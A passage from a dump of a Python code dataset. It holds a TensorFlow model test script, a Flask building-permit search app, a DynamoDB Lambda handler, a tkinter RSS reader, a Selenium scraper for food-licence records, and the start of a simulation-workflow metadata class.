feed_dict={self.img_input:img_batch, self.label_id: label_batch, self.keep_prob:0.7, self.is_training:False})\n\n if step%100 ==0:\n valid_accuracy,valid_loss = self.valid(sess)\n\n if valid_accuracy > max_accuracy:\n max_accuracy = valid_accuracy\n if valid_accuracy > 0.2 and valid_accuracy - self.max_acc_save >= 0.02:\n self.max_acc_save = max_accuracy\n best_models = \"models/best_models_{}_{}_{:.4f}_{}_{}.ckpt\".format(i,step, max_accuracy,self.w_len,self.fc_len)\n print('------save:{}'.format(best_models))\n self.max_acc_save = max_accuracy\n self.saver.save(sess,best_models)\n print(\"epoch: {} step: {} accuracy: {} max accuracy: {} loss:{}\".format(i, step, valid_accuracy, max_accuracy, valid_loss))\n\n def valid(self, sess):\n valid_batch = generate_stochastic_valid_batch(self.batch_size, True)\n valid_accuracy = []\n valid_loss = []\n for batch in valid_batch:\n (v_img_batch, v_label_batch) = batch\n acc = sess.run(self.accuracy,\n feed_dict={self.img_input: v_img_batch, self.label_id: v_label_batch,\n self.keep_prob: 1, self.is_training:False})\n valid_accuracy.append(acc)\n valid_loss.append(sess.run(self.loss, feed_dict={self.img_input: v_img_batch, self.label_id: v_label_batch, self.keep_prob: 1,self.is_training:False}))\n\n mean_acc = np.array(valid_accuracy, dtype=np.float32).mean()\n mean_loss = np.array(valid_loss, dtype=np.float32).mean()\n return mean_acc,mean_loss\n\ndef test():\n model_path = \"models/best_models_69_100_0.9431_1001_256.ckpt\"\n saver = tf.train.import_meta_graph(model_path+\".meta\") # 加载图结构\n graph = tf.get_default_graph()\n # tensor_name_list = [tensor.name for tensor in graph.as_graph_def().node]\n # with open(\"name.txt\",'w+')as f:\n # for n in tensor_name_list:\n # f.write(n+\"\\n\")\n img_input = graph.get_tensor_by_name(\"input:0\")\n label_id = graph.get_tensor_by_name(\"label:0\")\n keep_prob = graph.get_tensor_by_name(\"keep_prob:0\")\n accuracy = graph.get_tensor_by_name(\"my_accuracy:0\")\n is_train = graph.get_tensor_by_name(\"is_training:0\")\n test_batch = generate_stochastic_test_batch(100, False)\n test_accuracy = []\n with tf.Session() as sess:\n #ckpt = tf.train.get_checkpoint_state('models/')\n saver.restore(sess,\"models/best_models_69_100_0.9431_1001_256.ckpt\")\n for batch in test_batch:\n (v_img_batch, v_label_batch) = batch\n acc = sess.run(accuracy, feed_dict={img_input: v_img_batch, label_id: v_label_batch,\n keep_prob: 1, is_train: False})\n test_accuracy.append(acc)\n print(acc)\n #valid_loss.append(sess.run(self.loss, feed_dict={self.img_input: v_img_batch, self.label_id: v_label_batch, self.keep_prob: 1}))\n\n mean_acc = np.array(test_accuracy, dtype=np.float32).mean()\n # mean_loss = np.array(valid_loss, dtype=np.float32).mean()\n print(mean_acc)\n\n# t = transferLearningModel()\n# t.train()\ntest()","sub_path":"transfer_learning.py","file_name":"transfer_learning.py","file_ext":"py","file_size_in_byte":10888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"198514733","text":"from flask import Flask, render_template, request\nimport requests\nimport datetime\n\napp=Flask(__name__)\n\n\n@app.route(\"/\")\ndef search():\n return render_template(\"building_permit_search.html\", geocode=\"\", date_value=\"01/01/2020 - 01/15/2020\", initial_page=True)\n\n@app.route(\"/search\", methods=[\"POST\",\"GET\"]) \ndef after_searching():\n js_data=\"\"\n dateRange=\"01/01/2020 - 01/15/2020\"\n if request.method==\"POST\":\n dateRange=request.form.get(\"daterange\")\n dates=dateRange.split(\"-\")\n start_date,end_date=dates[0].strip(),dates[1].strip()\n start_date_format=\"'\"+str(datetime.datetime.strptime(start_date, '%m/%d/%Y').date())+\"'\"\n end_date_format=\"'\"+str(datetime.datetime.strptime(end_date, '%m/%d/%Y').date())+\"'\"\n print(\"start date:\",start_date_format)\n print(\"end date:\",end_date_format)\n res = requests.get(\"https://data.calgary.ca/resource/c2es-76ed.geojson\",\\\n params={\"$where\": \"issueddate > \"+start_date_format+\" and issueddate < \"+end_date_format})\n # \"$select\":\"issueddate, workclassgroup, contractorname, communityname, originaladdress,latitude,longitude\"})\n # print(\"status code=\", res.status_code)\n # print(\"data=\", res.json())\n \n if res.status_code==200:\n js_data=res.json()\n else:\n js_data=\"\"\n \n return render_template(\"building_permit_search.html\",geocode=js_data,date_value=dateRange, initial_page=False)\n\nif __name__== \"__main__\" :\n app.run(debug=True)","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"381784895","text":"from __future__ import print_function # Python 2/3 compatibility\nimport boto3\nfrom boto3.dynamodb.conditions import Key, Attr\nimport time\n\ndef handler(event, context):\n dynamodb = boto3.resource('dynamodb')\n players = dynamodb.Table('players')\n games = dynamodb.Table('games')\n \n datetime = int(time.time()*1000)\n # return(event)\n item = {\n \"name\": event['body']['name'],\n \"score\": 1500,\n \"id\": datetime,\n \n };\n players.put_item(Item=item)\n \n # Get everything and return \n player_entries = players.scan(\n FilterExpression=Attr('id').gt(0)\n )\n game_entries = games.scan(\n FilterExpression=Attr('id').gt(0)\n )\n \n return {\n 'players': player_entries,\n 'games': game_entries\n }","sub_path":"lamdas/update_players.py","file_name":"update_players.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"23523520","text":"#encoding: utf-8\r\nfrom tkinter import *\r\nfrom tkinter.ttk import Progressbar, Style\r\nfrom tkinter import tix\r\nfrom PIL import Image, ImageFont, ImageDraw, ImageTk, ImageOps\r\nfrom threading import Thread\r\nimport queue\r\nimport sys\r\nimport random\r\nimport webbrowser\r\nimport time\r\n\r\nimport localFluxs\r\nimport urls\r\nimport tools\r\nimport editurlsUI\r\n\r\nclass Entrie:\r\n def __init__(self, domain, name, link, summary, date, enclosure):\r\n self.name = name\r\n self.link = link\r\n self.date = tools.dateFromString(date)\r\n self.enclosure = enclosure\r\n self.dateString = \"Le \" + str(self.date.day) + \" \" + tools.numberToMonth(self.date.month) + \" \" + str(self.date.year) + \" à \" + str(self.date.hour) + \"h\" + str(self.date.minute)\r\n self.summary = summary[ 0 : 0 + 300]\r\n self.summary = self.summary.replace(\"\\n\", \"\")\r\n if self.summary == \"\":\r\n self.summary = \"Pas de description...\"\r\n self.enclosurePath = '../datas/fluxs/' + domain + \"/\" + self.enclosure\r\n\r\n def click(self, event):\r\n openBrowser(self.link)\r\n\r\nclass MainWindow(Canvas):\r\n def __init__(self):\r\n super().__init__()\r\n self.entries = localFluxs.getListOfEntries()\r\n\r\n #self.window_W = root.winfo_screenwidth() // problem with two screen on xfce\r\n self.window_W = 1080\r\n #self.window_Y = root.winfo_screenheight()\r\n self.window_Y = 720\r\n\r\n self.colors = {}\r\n self.colors[\"background\"] = \"#1a1a1a\",\r\n self.colors[\"newsTitle\"] = \"#ffffff\"\r\n self.colors[\"entrieTitle\"] = \"#ffffff\"\r\n self.colors[\"entrieInfos\"] = \"#808080\"\r\n self.colors[\"entrieBorder\"] = \"#00b4c4\"\r\n self.colors[\"menuBackground\"] = \"#2e2e2e\",\r\n self.colors[\"menuActiveBackground\"] = \"#1a1a1a\",\r\n self.colors[\"menuForeground\"] = \"#ffffff\",\r\n self.colors[\"menuActiveForeground\"] = \"#00b4c4\"\r\n self.colors[\"progBarBG\"] = \"#ffffff\"\r\n self.colors[\"progBarFG\"] = \"#00b4c4\"\r\n\r\n self.scrollCount = 0\r\n self.initUI()\r\n\r\n def secondaire(self):\r\n topEditUrl = Toplevel()\r\n editurlsUI.MainWindow(topEditUrl)\r\n\r\n def initUI(self):\r\n self.master.tk.call('wm', 'iconphoto', self.master._w, PhotoImage(file='../res/imgs/icon.png'))\r\n self.master.grid_rowconfigure(0, weight=1)\r\n self.master.grid_columnconfigure(0, weight=1)\r\n self.master.title('HandFeeder')\r\n\r\n ###### MENU\r\n menubar = Menu(self.master,\r\n font = \"OpenSans 13 bold\",\r\n background=self.colors[\"menuBackground\"],\r\n activebackground=self.colors[\"menuActiveBackground\"],\r\n foreground=self.colors[\"menuForeground\"],\r\n activeforeground=self.colors[\"menuActiveForeground\"]\r\n )\r\n self.master.config(menu=menubar)\r\n\r\n feedsMenu = Menu(menubar,\r\n font = \"OpenSans 13 bold\",\r\n background=self.colors[\"menuBackground\"],\r\n activebackground=self.colors[\"menuActiveBackground\"],\r\n foreground=self.colors[\"menuForeground\"],\r\n activeforeground=self.colors[\"menuActiveForeground\"]\r\n )\r\n feedsMenu.add_command(label=\"Actualize\", command=self.actualize)\r\n feedsMenu.add_command(label=\"Feeds...\", command=self.secondaire)\r\n menubar.add_cascade(label=\"Settings\", menu=feedsMenu)\r\n ###### END MENU\r\n\r\n # Canvas qui fait \"cadre\"\r\n self.win = Canvas(self.master, \r\n width = self.window_W, \r\n height = self.window_Y, \r\n background = self.colors[\"background\"],\r\n highlightbackground = self.colors[\"background\"],\r\n highlightcolor = self.colors[\"background\"]\r\n )\r\n self.win.grid(row=0, column=0, sticky='nswe')\r\n # Scroll\r\n self.win.bind_all(\"\", self.on_mousewheel) # WINDOWS\r\n self.win.bind_all('<4>', self.on_mousewheel) # LINUX\r\n self.win.bind_all('<5>', self.on_mousewheel) # LINUX\r\n\r\n # scrollbars\r\n hScroll = Scrollbar(self.master, orient=HORIZONTAL, command=self.win.xview)\r\n hScroll.grid(row=1, column=0, sticky='we')\r\n\r\n vScroll = Scrollbar(self.master, orient=VERTICAL, command=self.win.yview)\r\n vScroll.grid(row=0, column=1, sticky='ns')\r\n\r\n self.win.configure(xscrollcommand=hScroll.set, yscrollcommand=vScroll.set)\r\n\r\n # frame des entrées\r\n self.entriesFrame = self.updateEntries()\r\n\r\n # création de la window dans le canvas\r\n self.win.create_window(0, 0, window=self.entriesFrame, anchor=NW)\r\n\r\n # scrollregion sur toute la taille du canvas\r\n self.win.configure(scrollregion=self.win.bbox(ALL))\r\n\r\n #resize\r\n self.win.bind('', self.resize)\r\n\r\n def resize(self, event):\r\n w,h = event.width, event.height\r\n\r\n self.win.config(width=w, height=h)\r\n self.window_W=w\r\n self.window_Y=h\r\n\r\n self.entriesFrame.destroy()\r\n self.entriesFrame = self.updateEntries()\r\n self.win.create_window(0, 0, window=self.entriesFrame, anchor=NW)\r\n\r\n # scrollregion sur toute la taille du canvas\r\n self.win.configure(scrollregion=self.win.bbox(ALL)) \r\n\r\n def actualize(self):\r\n # show loading animation\r\n self.loadingAnimation()\r\n # start thread for updating\r\n self.queue = queue.Queue()\r\n UpdateThread(self.queue).start()\r\n # check if actualize finished\r\n self.master.after(100, self.isActualizeFinished)\r\n\r\n def loadingAnimation(self):\r\n self.entriesFrame.destroy()\r\n self.entriesFrame = Frame(\r\n self.win, \r\n bg=self.colors[\"background\"]\r\n )\r\n Label(self.entriesFrame, bg=self.colors[\"background\"]).pack() # For space\r\n news_title = Label(self.entriesFrame,\r\n text = \"Loading...\",\r\n font = \"OpenSans 25 bold\",\r\n fg=self.colors[\"newsTitle\"],\r\n bg=self.colors[\"background\"])\r\n news_title.pack(padx=80)\r\n Label(self.entriesFrame, bg=self.colors[\"background\"]).pack() # For space\r\n\r\n barStyle = Style()\r\n barStyle.configure(\"bar.Horizontal.TProgressbar\", \r\n troughcolor=self.colors[\"progBarBG\"],\r\n bordercolor=self.colors[\"progBarBG\"],\r\n background=self.colors[\"progBarFG\"],\r\n lightcolor=self.colors[\"progBarFG\"],\r\n darkcolor=self.colors[\"progBarFG\"]\r\n )\r\n self.prog_bar = Progressbar(\r\n self.entriesFrame, \r\n style=\"bar.Horizontal.TProgressbar\",\r\n orient=\"horizontal\",\r\n length=200, \r\n mode=\"indeterminate\"\r\n )\r\n self.prog_bar.pack(padx=80)\r\n self.prog_bar.start()\r\n\r\n self.entriesFrame.update()\r\n self.win.create_window(0, 0, window=self.entriesFrame, anchor=NW)\r\n self.win.configure(scrollregion=self.win.bbox(ALL))\r\n \r\n def isActualizeFinished(self):\r\n try:\r\n # except if not finished\r\n msg = self.queue.get(0)\r\n\r\n # print new entries\r\n self.entriesFrame.destroy()\r\n self.entries = localFluxs.getListOfEntries()\r\n self.entriesFrame = self.updateEntries()\r\n self.win.create_window(0, 0, window=self.entriesFrame, anchor=NW)\r\n self.win.configure(scrollregion=self.win.bbox(ALL))\r\n except queue.Empty:\r\n # check if actualize finished\r\n self.master.after(100, self.isActualizeFinished)\r\n\r\n def updateEntries(self):\r\n entriesFrame = Frame(\r\n self.win, \r\n bg=self.colors[\"background\"]\r\n )\r\n\r\n #newsTitle\r\n Label(entriesFrame, bg=self.colors[\"background\"]).pack() # For space\r\n news_title = Label(entriesFrame,\r\n text = \"Latest news\",\r\n font = \"OpenSans 25 bold\",\r\n fg=self.colors[\"newsTitle\"],\r\n bg=self.colors[\"background\"])\r\n news_title.pack(padx=\"80\")\r\n Label(entriesFrame, bg=self.colors[\"background\"]).pack() # For space\r\n\r\n # remplissage avec les articles\r\n for i in range(len(self.entries)):\r\n #Create entrie obj\r\n entrie = Entrie(self.entries[i][\"domain\"], self.entries[i][\"title\"], self.entries[i][\"link\"], self.entries[i][\"summary\"], self.entries[i][\"date\"], self.entries[i][\"enclosure\"])\r\n\r\n # Entrie frame\r\n entrie_frame = Frame(entriesFrame, width=self.window_W-80, height=140)\r\n entrie_frame.config(\r\n bg=self.colors[\"background\"]\r\n )\r\n entrie_frame.bind(\"\", entrie.click)\r\n\r\n #enclosure\r\n if entrie.enclosure != \"\":\r\n load = Image.open(entrie.enclosurePath)\r\n #load = load.thumbnail((140, 140), Image.ANTIALIAS)\r\n load = ImageOps.fit(load, (140, 140), Image.ANTIALIAS)\r\n render = ImageTk.PhotoImage(load)\r\n entrie_enclosure = Label(entrie_frame, \r\n image=render\r\n )\r\n entrie_enclosure.image = render\r\n entrie_enclosure.place(x=0, y=0)\r\n\r\n #title\r\n entrie_title = Label(entrie_frame,\r\n text=entrie.name,\r\n font = \"OpenSans 18 bold\",\r\n fg=self.colors[\"entrieTitle\"],\r\n bg=self.colors[\"background\"])\r\n entrie_title.bind(\"\", entrie.click)\r\n entrie_title.place(x=160, y=15)\r\n\r\n #source\r\n entrie_source = Label(entrie_frame,\r\n text=tools.domainOfUrl(entrie.link),\r\n font = \"OpenSans 15 bold\",\r\n fg=self.colors[\"entrieInfos\"],\r\n bg=self.colors[\"background\"])\r\n entrie_source.bind(\"\", entrie.click)\r\n entrie_source.place(x=160, y=45)\r\n\r\n #date\r\n entrie_date = Label(entrie_frame,\r\n text=entrie.dateString,\r\n font = \"OpenSans 13 bold\",\r\n fg=self.colors[\"entrieInfos\"],\r\n bg=self.colors[\"background\"])\r\n entrie_date.bind(\"\", entrie.click)\r\n entrie_date.place(x=160, y=70)\r\n\r\n #summary\r\n entrie_desc = Label(entrie_frame,\r\n text=entrie.summary,\r\n font = \"OpenSans 15 bold\",\r\n fg=self.colors[\"entrieInfos\"],\r\n bg=self.colors[\"background\"])\r\n entrie_desc.bind(\"\", entrie.click)\r\n entrie_desc.place(x=160, y=95)\r\n\r\n Label(entriesFrame, bg=self.colors[\"background\"], font = \"OpenSans 1 bold\").pack() # For space\r\n # End entrie frame\r\n entrie_frame.pack(padx=40, pady=20)\r\n\r\n # calcul des dimensions\r\n entriesFrame.update()\r\n return entriesFrame\r\n\r\n def on_mousewheel(self, event):\r\n if event.num == 5 or event.delta == -120:\r\n self.win.yview_scroll(1, UNITS)\r\n if event.num == 4 or event.delta == 120:\r\n self.win.yview_scroll(-1, UNITS)\r\n\r\nclass UpdateThread(Thread):\r\n def __init__(self, queue):\r\n Thread.__init__(self)\r\n self.queue = queue\r\n def run(self):\r\n localFluxs.updateLocalFile()\r\n self.queue.put(\"Update finished\")\r\n\r\ndef openBrowser(url):\r\n print(url)\r\n webbrowser.open(url)\r\n\r\nroot = Tk()\r\napp = MainWindow()\r\nroot.mainloop()\r\n","sub_path":"scripts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"601293767","text":"import json\r\nimport os\r\nimport time\r\nimport uuid\r\nfrom pprint import pprint\r\n\r\nimport boto3\r\nfrom botocore.exceptions import ClientError\r\n\r\nfrom modules.db import DB\r\nfrom modules.utils import GcpOcr\r\n\r\n\r\nclass FSSAI:\r\n\r\n def __init__(self,refid,env = \"quality\"):\r\n\r\n self.timeBwPage = 0.5\r\n\r\n assert env == \"quality\" or env == \"prod\", (\"env value should be either quality or prod\")\r\n self.env = env\r\n self.screenshotDir = os.path.join(os.getcwd(), \"Screenshots\")\r\n self.ocr = GcpOcr(\"gcp.json\")\r\n self.readConfig()\r\n self.CreateS3()\r\n self.dbObj = DB(**self.dbConfig)\r\n self.refid = refid\r\n\r\n\r\n\r\n\r\n def readConfig(self):\r\n configFileName = f\"config_{self.env}.json\"\r\n with open(configFileName, 'r') as confFile:\r\n config = json.load(confFile)\r\n self.driverConfig = config['driverConfig']\r\n self.dbConfig = config['dbConfig']\r\n\r\n def makeDirIfNot(self, dirpath):\r\n\r\n try:\r\n os.makedirs(dirpath)\r\n\r\n except FileExistsError:\r\n pass\r\n\r\n def makeDriverDirs(self):\r\n self.makeDirIfNot(self.screenshotDir)\r\n\r\n def CreateS3(self):\r\n\r\n try:\r\n self.session = boto3.session.Session(aws_access_key_id=self.driverConfig['s3']['AWS_ACCESS_KEY_ID'],\r\n aws_secret_access_key=self.driverConfig['s3']['AWS_SECRET_ACCESS_KEY'],\r\n region_name=self.driverConfig['s3']['REGION_HOST'])\r\n\r\n self.resource = self.session.resource(\"s3\")\r\n self.bucket = self.resource.Bucket(self.driverConfig[\"s3\"][\"AWS_STORAGE_BUCKET_NAME\"])\r\n\r\n except ClientError as e:\r\n self.logStatus(\"critical\", f\"could not connect to s3 {e}\")\r\n raise Exception(\"couldn't connect to s3\")\r\n\r\n except Exception as e:\r\n self.logStatus(\"critical\", f\"could not connect to s3 {e}\")\r\n raise Exception(\"couldn't connect to s3\")\r\n\r\n def uploadToS3(self, filename, key):\r\n self.bucket.upload_file(\r\n Filename=filename, Key=key)\r\n\r\n def takeScreenshot(self):\r\n\r\n time.sleep(self.timeBwPage)\r\n\r\n sname = str(uuid.uuid1()) + '.png'\r\n screenshotName = os.path.join(self.screenshotDir, f\"{sname}\")\r\n self.driver.save_screenshot(screenshotName)\r\n self.uploadToS3(os.path.join(screenshotName), 'screenshots/' + self.refid + \"/\" + sname)\r\n return sname\r\n\r\n def logStatus(self, level, message, screenshot=None):\r\n\r\n if self.dbObj is not None:\r\n\r\n self.dbObj.insertLog(self.refid, time.strftime('%Y-%m-%d %H-%M-%S'), level, message,\r\n 'KAGGLE', self.env, screenshot)\r\n print(f\"{level}: {message}, screenshot: {screenshot}\")\r\n\r\n def generate_response(self,LicenseKey):\r\n from selenium import webdriver\r\n from selenium.webdriver.chrome.options import Options\r\n chrome_options = Options()\r\n chrome_options.add_argument(\"--disable-extensions\")\r\n chrome_options.add_argument(\"--disable-gpu\")\r\n chrome_options.add_argument(\"--headless\")\r\n chrome_options.headless = True\r\n chrome_options.add_argument(\"--disable-extension\")\r\n chrome_options.add_argument(\"no-sandbox\")\r\n self.driver = webdriver.Chrome(\"/usr/local/bin/chromedriver\", options=chrome_options)\r\n start_url = \"https://www.kaggle.com/\"\r\n try:\r\n self.driver.get(start_url)\r\n x = 1\r\n self.makeDriverDirs()\r\n self.logStatus(\"info\", \"FSSAI page opened\", self.takeScreenshot())\r\n try:\r\n\r\n cantreach = self.driver.find_element_by_xpath(\"\"\"//*[@id=\"main-message\"]/h1/span\"\"\")\r\n cantreach = cantreach.text\r\n\r\n if cantreach == cantreach:\r\n r = 2\r\n except:\r\n pass\r\n except Exception as e:\r\n x = 2\r\n\r\n self.driver.find_element_by_xpath(\"\"\"//*[@id=\"ctl00_ContentPlaceHolder1_txtLicense\"]\"\"\").click()\r\n self.driver.find_element_by_xpath(\"\"\"//*[@id=\"ctl00_ContentPlaceHolder1_txtLicense\"]\"\"\").send_keys(LicenseKey)\r\n\r\n self.driver.find_element_by_xpath(\"\"\"//*[@id=\"ctl00_ContentPlaceHolder1_btnSubmit\"]\"\"\").click()\r\n\r\n if x == 1:\r\n #try:\r\n # errortype1 = self.driver.find_element_by_xpath(\r\n # \"\"\"//*[@id=\"form1\"]/table/tbody/tr[1]/td/table/tbody/tr[1]/td/h5\"\"\")\r\n # errortype1 = errortype1.text\r\n # if errortype1 == \" An error has occured, sorry for the inconvenience. Please login again.\":\r\n # x = 2\r\n #except:\r\n # pass\r\n\r\n try:\r\n errortype = self.driver.find_element_by_xpath(\"\"\"//*[@id=\"ctl00_ContentPlaceHolder1_lblError\"]\"\"\")\r\n errortype = errortype.text\r\n errortype1 = self.driver.find_element_by_xpath(\"\"\"// *[ @ id = \"form1\"] / table / tbody / tr[1] / td / table / tbody / tr[1] / td / h5\"\"\")\r\n errortype1 = errortype1.text\r\n if errortype == \"Record Not Found\":\r\n x = 3\r\n elif errortype == \"Timeout expired. The timeout period elapsed prior to completion of the operation or the server is not responding.\":\r\n x = 4\r\n elif errortype == \"Invalid License No.\":\r\n x = 3\r\n elif errortype == \"Invalid object name 'Master_ErrorDesc'.\":\r\n x = 3\r\n elif errortype1 == errortype1:\r\n x = 4\r\n\r\n except:\r\n x = 6\r\n if x == 6:\r\n self.makeDriverDirs()\r\n self.logStatus(\"info\", \"starting scraping\", self.takeScreenshot())\r\n Products = self.driver.find_element_by_xpath(\"\"\"//*[@id=\"ctl00_ContentPlaceHolder1_lblProduct\"]\"\"\")\r\n Productstext = Products.text\r\n Id = self.driver.find_element_by_xpath(\"\"\"//*[@id=\"ctl00_ContentPlaceHolder1_lblLicence\"]\"\"\")\r\n IDnum = Id.text\r\n Expiry_Date = self.driver.find_element_by_xpath(\"\"\"//*[@id=\"ctl00_ContentPlaceHolder1_lblExpDate\"]\"\"\")\r\n ExpiryDate = Expiry_Date.text\r\n from datetime import datetime\r\n date_obj = datetime.strptime(ExpiryDate, '%d/%m/%Y')\r\n ExpiryDate = date_obj.strftime('%d-%b-%Y')\r\n Status = self.driver.find_element_by_xpath(\"\"\"//*[@id=\"ctl00_ContentPlaceHolder1_lblStatus\"]\"\"\")\r\n GivenStatus = Status.text\r\n Company_Name = self.driver.find_element_by_xpath(\"\"\"//*[@id=\"ctl00_ContentPlaceHolder1_lblcopName\"]\"\"\")\r\n CompanyName = Company_Name.text\r\n Premises_Address = self.driver.find_element_by_xpath(\"\"\"//*[@id=\"ctl00_ContentPlaceHolder1_lblAddress\"]\"\"\")\r\n PremisesAddress = Premises_Address.text\r\n Kind_of_Business = self.driver.find_element_by_xpath(\"\"\"//*[@id=\"ctl00_ContentPlaceHolder1_lblKob\"]\"\"\")\r\n KindofBusiness = Kind_of_Business.text\r\n message = \"Successfully Completed.\"\r\n code = \"SRC001\"\r\n dic = {}\r\n dic[\"companyName\"] = CompanyName\r\n dic[\"expiryDate\"] = ExpiryDate\r\n dic[\"kindOfBusiness\"] = KindofBusiness\r\n dic[\"licenceNumber\"] = IDnum\r\n dic[\"premisesAddress\"] = PremisesAddress\r\n dic[\"products\"] = Productstext\r\n dic[\"status\"] = GivenStatus\r\n dic = {\"data\": dic, \"responseCode\": code, \"responseMessage\": message}\r\n self.logStatus(\"info\", \"completed scraping\", self.takeScreenshot())\r\n return dic\r\n\r\n\r\n elif x == 2:\r\n message = 'Unable To Process. Please Reach Out To Support.'\r\n code = 'EUP007'\r\n IDnum = 'null'\r\n ExpiryDate = 'null'\r\n KindofBusiness = 'null'\r\n Productstext = 'null'\r\n GivenStatus = 'null'\r\n CompanyName = 'null'\r\n PremisesAddress = 'null'\r\n dic = {}\r\n dic['companyName'] = CompanyName\r\n dic['expiryDate'] = ExpiryDate\r\n dic['kindOfBusiness'] = KindofBusiness\r\n dic['licenceNumber'] = IDnum\r\n dic['premisesAddress'] = PremisesAddress\r\n dic['products'] = Productstext\r\n dic['status'] = GivenStatus\r\n dic = {'data': dic, 'responseCode': code, 'responseMessage': message}\r\n return dic\r\n elif x == 3:\r\n dic = {}\r\n IDnum = 'null'\r\n ExpiryDate = 'null'\r\n KindofBusiness = 'null'\r\n Productstext = 'null'\r\n GivenStatus = 'null'\r\n CompanyName = 'null'\r\n PremisesAddress = 'null'\r\n message = 'No Information Found.'\r\n code = 'ENI004'\r\n dic['companyName'] = CompanyName\r\n dic['expiryDate'] = ExpiryDate\r\n dic['kindOfBusiness'] = KindofBusiness\r\n dic['licenceNumber'] = IDnum\r\n dic['premisesAddress'] = PremisesAddress\r\n dic['products'] = Productstext\r\n dic['status'] = GivenStatus\r\n dic = {'data': dic, 'responseCode': code, 'responseMessage': message}\r\n return dic\r\n elif x == 4:\r\n Products = self.driver.find_element_by_xpath(\"\"\"//*[@id=\"ctl00_ContentPlaceHolder1_lblProduct\"]\"\"\")\r\n Productstext = Products.text\r\n return Exception\r\n\r\n def FSSAI_response(self,LicenseKey):\r\n import json\r\n\r\n LicenseKey = LicenseKey\r\n dic = {}\r\n try:\r\n self.logStatus(\"info\", \"Opening webpage\")\r\n dic = self.generate_response(LicenseKey)\r\n except Exception as e:\r\n print(e)\r\n self.logStatus(\"critical\", \"timeout error retrying\")\r\n try:\r\n self.logStatus(\"info\", \"Opening webpage\")\r\n dic = self.generate_response(LicenseKey)\r\n except Exception as e:\r\n print(e)\r\n self.logStatus(\"critical\", \"timeout error retrying\")\r\n try:\r\n self.logStatus(\"info\", \"Opening webpage\")\r\n dic = self.generate_response(LicenseKey)\r\n except Exception as e:\r\n print(e)\r\n self.logStatus(\"critical\", \"no data found\")\r\n IDnum = 'null'\r\n ExpiryDate = 'null'\r\n KindofBusiness = 'null'\r\n Productstext = 'null'\r\n GivenStatus = 'null'\r\n CompanyName = 'null'\r\n PremisesAddress = 'null'\r\n message = 'Unable To Process. Please Reach Out To Support.'\r\n code = 'EUP007'\r\n dic['companyName'] = CompanyName\r\n dic['expiryDate'] = ExpiryDate\r\n dic['kindOfBusiness'] = KindofBusiness\r\n dic['licenceNumber'] = IDnum\r\n dic['premisesAddress'] = PremisesAddress\r\n dic['products'] = Productstext\r\n dic['status'] = GivenStatus\r\n dic = {'data': dic, 'responseCode': code, 'responseMessage': message}\r\n self.logStatus(\"info\", \"No Info Found\")\r\n dic = json.dumps(dic)\r\n return dic\r\n","sub_path":"Kagglescrapper.py","file_name":"Kagglescrapper.py","file_ext":"py","file_size_in_byte":11488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"137301292","text":"import datetime\nimport logging\nimport uuid\nfrom pathlib import Path\n\nimport simtools.util.general as gen\nimport simtools.version\nfrom simtools import io_handler\nfrom simtools.data_model import meta_data_model, validate_schema\nfrom simtools.util import names\n\n__all__ = [\"WorkflowDescription\"]\n\n\nclass WorkflowDescription:\n \"\"\"\n Workflow description, configuration and metadata class.\n Assigns uuid to workflow in ACIVITY:ID\n\n Parameters\n ----------\n args: argparse.Namespace\n Command line parameters\n\n \"\"\"\n\n def __init__(self, args_dict):\n \"\"\"\n Initialize workflow configuration.\n \"\"\"\n\n self._logger = logging.getLogger(__name__)\n self.io_handler = io_handler.IOHandler()\n\n self.args_dict = args_dict\n self.workflow_config = meta_data_model.workflow_configuration_schema()\n self.workflow_config[\"activity\"][\"name\"] = args_dict[\"label\"]\n self.workflow_config[\"activity\"][\"id\"] = str(uuid.uuid4())\n\n self._read_workflow_configuration(self.args_dict.get(\"workflow_config\", None))\n self.workflow_config[\"configuration\"] = self.args_dict\n\n self.top_level_meta = gen.change_dict_keys_case(\n meta_data_model.top_level_reference_schema(), True\n )\n self.collect_product_meta_data()\n\n def collect_product_meta_data(self):\n \"\"\"\n Collect and verify product metadata.\n\n \"\"\"\n\n self._fill_association_meta_from_args(\n self.top_level_meta[\"cta\"][\"context\"][\"sim\"][\"association\"]\n )\n\n self._fill_product_meta(self.top_level_meta[\"cta\"][\"product\"])\n\n self._fill_top_level_meta_from_file(self.top_level_meta[\"cta\"])\n\n self._fill_association_id(self.top_level_meta[\"cta\"][\"context\"][\"sim\"][\"association\"])\n\n self._fill_activity_meta(self.top_level_meta[\"cta\"][\"activity\"])\n\n def set_configuration_parameter(self, key, value):\n \"\"\"\n Set value of workflow configuration parameter.\n\n Parameters\n ----------\n key: (str,required)\n Key of the workflow configuration dict.\n value: (str,required)\n Value of the workflow configuration dict associated to 'key'.\n\n Raises\n ------\n KeyError\n if configuration does not exist in workflow.\n\n \"\"\"\n try:\n self.workflow_config[\"configuration\"][key] = value\n except KeyError:\n self._logger.error(f\"Missing key {key} in configuration\")\n raise\n\n def get_configuration_parameter(self, key):\n \"\"\"\n Return value of workflow configuration parameter.\n\n Parameters\n ----------\n key: (str,required)\n Key of the workflow configuration dict.\n\n Returns\n -------\n configuration value\n value of configuration parameter\n\n Raises\n ------\n KeyError\n if configuration does not exist in workflow\n \"\"\"\n\n try:\n return self.workflow_config[\"configuration\"][key]\n except KeyError:\n self._logger.error(f\"Missing key {key} in configuration\")\n raise\n\n def reference_data_columns(self):\n \"\"\"\n Return reference data column definition expected in input data.\n\n Returns\n -------\n data_columns dict\n Reference data columns\n\n Raises\n ------\n KeyError\n if data_columns does not exist in workflow configuration.\n\n \"\"\"\n\n try:\n return self.workflow_config[\"data_columns\"]\n except KeyError:\n self._logger.error(\"Missing data_columns entry in workflow configuration\")\n print(self.workflow_config)\n raise\n\n def product_data_file_name(self, suffix=None, full_path=True):\n \"\"\"\n Return name of product data file.\n\n File name is the combination of activity id (or 'TEST' if CONFIGURATION:TEST is set) and:\n a. Top-level meta ['product']['name']\n or\n b. Top-level meta ['activity']['name']\n\n (depending which one is set)\n\n 